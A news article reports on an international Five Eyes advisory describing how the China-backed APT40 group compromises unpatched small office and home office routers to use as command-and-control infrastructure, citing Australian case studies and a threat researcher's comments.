Chinese spies target vulnerable home office kit to run cyber attacks

The APT40 group, backed by China, has been actively targeting new victims by exploiting vulnerabilities in small office and home office (SoHo) networking devices for command and control (C2) activity during their attacks. This information comes from an international alert issued by the Five Eyes allied cyber agencies from Australia, Canada, New Zealand, the UK and the US, along with partner bodies from Germany, Japan, and South Korea.

The Australian Cyber Security Centre (ACSC) stated that APT40 has targeted networks in Australia and globally using compromised SoHo devices. In two case studies published by the Australian authorities, APT40 used SoHo devices as operational infrastructure and redirectors during attacks, making their activity somewhat easier to track.

SoHo networking devices are easier targets for malicious actors compared to large enterprise equivalents. Many of these devices are end-of-life or unpatched, offering a soft target for exploitation. Once compromised, they provide a launching point for attacks to blend in with legitimate traffic and challenge network defenders.

APT40 occasionally uses procured or leased infrastructure as victim-facing C2 infrastructure, but this technique seems to be declining. The ACSC shared details of an APT40 cyber attack in August 2022, where a malicious IP interacted with the target network using a device likely belonging to a small business or home user.

Mohammed Kazem, senior threat intelligence researcher at WithSecure, highlighted the continuous evolution of Chinese government/state-sponsored cyber operations. He noted the trend among PRC actors to target edge devices via exploitation and leverage compromised devices for stealthier operations.